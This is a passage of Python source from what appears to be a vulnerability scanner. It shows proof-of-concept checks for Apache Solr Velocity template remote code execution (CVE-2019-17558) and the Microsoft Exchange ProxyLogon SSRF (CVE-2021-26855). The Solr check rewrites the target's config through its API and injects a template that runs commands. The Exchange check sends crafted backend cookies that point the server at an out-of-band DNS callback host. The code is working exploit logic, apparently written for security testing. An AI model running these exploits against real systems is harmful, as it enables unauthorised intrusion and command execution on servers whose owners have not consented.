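         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace(
             "RECOMMAND", "whoami")
         self.vul_info[
             "vul_name"] = "Apache Solr Velocity template Remote Code Execution"
         self.vul_info["vul_numb"] = "CVE-2019-17558"
         self.vul_info["vul_apps"] = "Solr"
         self.vul_info["vul_date"] = "2017-10-16"
         self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "Remote Code Execution"
         self.vul_info["vul_data"] = "null"
         self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
         self.vul_info["cre_auth"] = "zhzyker"
         dns = dns_request()
         cmd = "ping " + dns
         template_payload = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
         url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
         try:
             request = requests.get(url_core,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
             core_name = None
             try:
                 core_name = list(json.loads(request.text)["status"])[0]
             except (ValueError, KeyError, IndexError, TypeError):
                 pass
             if core_name is None:
                 # No core: the original still posted to "/solr/None/config" and
                 # would have raised TypeError in the success branch below.
                 verify.scan_print(self.vul_info)
                 return
             url_api = self.url + "/solr/" + str(core_name) + "/config"
             headers_json = {
                 'Content-Type': 'application/json',
                 'User-Agent': self.ua
             }
             # Body is kept byte-for-byte (including its indentation); it is
             # what the target receives.
             set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
             try:
                 r = requests.post(url_api,
                                   data=set_api_data,
                                   headers=headers_json,
                                   timeout=self.timeout,
                                   verify=False)
                 req = requests.get(self.url + "/solr/" + str(core_name) +
                                    template_payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
                 req = dump.dump_all(req).decode('utf-8', 'ignore')
                 r = dump.dump_all(r).decode('utf-8', 'ignore')
             except requests.exceptions.RequestException:
                 # Best-effort: a stalled template request still leaves the DNS
                 # callback as the authoritative signal.
                 req = "timeout"
                 r = "timeout"
             core_url = self.url + "/solr/" + str(core_name)
             if dns_result(dns):
                 self.vul_info["vul_data"] = req
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[dns] [corename: " + core_url + " ]"
             else:
                 # Weak heuristic kept from the original: a core exists, so the
                 # endpoints were reachable; nothing proves the template ran.
                 self.vul_info["vul_data"] = r
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["prt_info"] = "[maybe] [corename: " + core_url + " ]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release on every path; the original leaked the lock if scan_print()
         # or dns_result() raised.
         self.threadLock.release()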
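 def cve_2021_26855_poc(self):
     """Probe Microsoft Exchange for CVE-2021-26855, the pre-auth SSRF (ProxyLogon entry point).

     GETs ``/owa/auth/x.js`` with ``X-AnonResource``/``X-BEResource`` cookies whose
     backend host is the out-of-band callback host from ``dns_request()``. A DNS
     lookup of that host seen by ``dns_result()`` is ``PoCSuCCeSS``. Otherwise the
     same cookies are sent with ``localhost`` as the backend; an HTTP 500 whose
     body mentions ``NegotiateSecurityContext failed with for host`` together with
     ``TargetUnknown`` and ``localhost`` is reported as ``PoC_MaYbE`` (the backend
     proxying happened, but nothing external was contacted).

     Results go to ``self.vul_info`` / ``verify``; nothing is returned and no
     exception escapes. Authorised targets only.
     """
     self.threadLock.acquire()
     try:
         self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855"
         self.vul_info["prt_resu"] = "null"
         self.vul_info["prt_info"] = "null"
         self.vul_info["vul_urls"] = self.url
         self.vul_info["vul_payd"] = "null"
         self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF"
         self.vul_info["vul_numb"] = "CVE-2021-26855"
         self.vul_info["vul_apps"] = "Exchange"
         self.vul_info["vul_date"] = "2021-03-03"
         self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
         self.vul_info["vul_risk"] = "high"
         self.vul_info["vul_type"] = "SSRF"
         self.vul_info["vul_data"] = "null"
         # NOTE(review): this description is about the post-auth file-write bug
         # of the same Exchange chain, not the SSRF tested here; it is report
         # text, so it is left unchanged.
         self.vul_info[
             "vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。"
         self.vul_info["cre_date"] = "2021-03-07"
         self.vul_info["cre_auth"] = "zhzyker"
         url = self.url + "/owa/auth/x.js"
         dns = dns_request()
         # One template for both variants (the original duplicated the literal).
         cookie_template = ("X-AnonResource=true; "
                            "X-AnonResource-Backend=localhost/ecp/default.flt?~3; "
                            "X-BEResource=localhost/owa/auth/logon.aspx?~3;")
         cookie_local = cookie_template
         cookie_dns = cookie_template.replace("localhost", dns)
         try:
             headers = {
                 "User-agent": self.ua,
                 "Cookie": cookie_dns,
                 "Connection": "close"
             }
             res = requests.get(url,
                                headers=headers,
                                timeout=self.timeout,
                                verify=False)
             if dns_result(dns):
                 self.vul_info["vul_data"] = dump.dump_all(res).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = headers["Cookie"]
                 self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[
                     "Cookie"] + "]"
             else:
                 headers = {
                     "User-agent": self.ua,
                     "Cookie": cookie_local,
                     "Connection": "close"
                 }
                 res = requests.get(url,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
                 backend_error = (res.status_code == 500
                                  and "NegotiateSecurityContext failed with for host" in res.text)
                 if backend_error and r"TargetUnknown" in res.text and r"localhost" in res.text:
                     self.vul_info["vul_data"] = dump.dump_all(res).decode(
                         'utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info["vul_payd"] = headers["Cookie"]
                     self.vul_info[
                         "prt_info"] = "[ssrf] [maybe] [cookie: " + headers[
                             "Cookie"] + "]"
             verify.scan_print(self.vul_info)
         except requests.exceptions.Timeout:
             verify.timeout_print(self.vul_info["prt_name"])
         except requests.exceptions.ConnectionError:
             verify.connection_print(self.vul_info["prt_name"])
         except Exception:
             verify.error_print(self.vul_info["prt_name"])
     finally:
         # Release on every path; the original leaked the lock if scan_print()
         # or dns_result() raised.
         self.threadLock.release()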